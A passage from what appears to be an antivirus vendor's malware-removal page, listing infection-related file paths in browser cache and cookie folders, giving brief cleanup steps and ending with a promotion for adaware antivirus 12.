    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LQUMIDKJ\qlogin[1].htm (800 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AJFV5BC8.txt (89 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X66G0HIG\2409490842014111013118567[1].htm (41101 bytes)

  4. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  5. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Average: 4.5 (2 votes)

x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now